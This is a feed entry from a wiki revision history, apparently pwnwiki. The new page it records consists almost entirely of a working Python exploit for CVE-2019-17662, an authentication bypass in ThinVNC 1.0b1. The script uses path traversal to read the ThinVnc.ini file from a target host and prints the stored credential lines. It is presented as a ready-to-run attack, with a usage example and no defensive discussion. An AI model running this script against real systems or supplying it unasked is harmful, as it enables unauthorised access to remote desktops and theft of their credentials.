https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E 2026-04-07T06:33:30Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2019-17662_ThinVNC_1.0b1_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=1682&oldid=prev 2021-04-15T06:42:07Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https:/...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass<br /> # Date: 2019-10-17<br /> # Exploit Author: Nikhith Tumamlapalli<br /> # Contributor WarMarX<br /> # Vendor Homepage: https://sourceforge.net/projects/thinvnc/<br /> # Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download<br /> # Version: 1.0b1<br /> # Tested on: Windows All Platforms<br /> # CVE : CVE-2019-17662<br /> <br /> # Description:<br /> # Authentication Bypass via Arbitrary File Read<br /> <br /> #!/usr/bin/python3<br /> <br /> import sys<br /> import os<br /> import requests<br /> <br /> def exploit(host,port):<br /> url = &quot;http://&quot; + host +&quot;:&quot;+port+&quot;/xyz/../../ThinVnc.ini&quot;<br /> r = requests.get(url)<br /> body = r.text<br /> print(body.splitlines()[2])<br /> print(body.splitlines()[3])<br /> <br /> <br /> <br /> def main():<br /> if(len(sys.argv)!=3):<br /> print(&quot;Usage:\n{} &lt;host&gt; &lt;port&gt;\n&quot;.format(sys.argv[0]))<br /> print(&quot;Example:\n{} 192.168.0.10 5888&quot;)<br /> else:<br /> port = sys.argv[2]<br /> host = sys.argv[1]<br /> exploit(host,port)<br /> <br /> if __name__ == '__main__':<br /> main()<br /> &lt;/pre&gt;</div>

Pwnwiki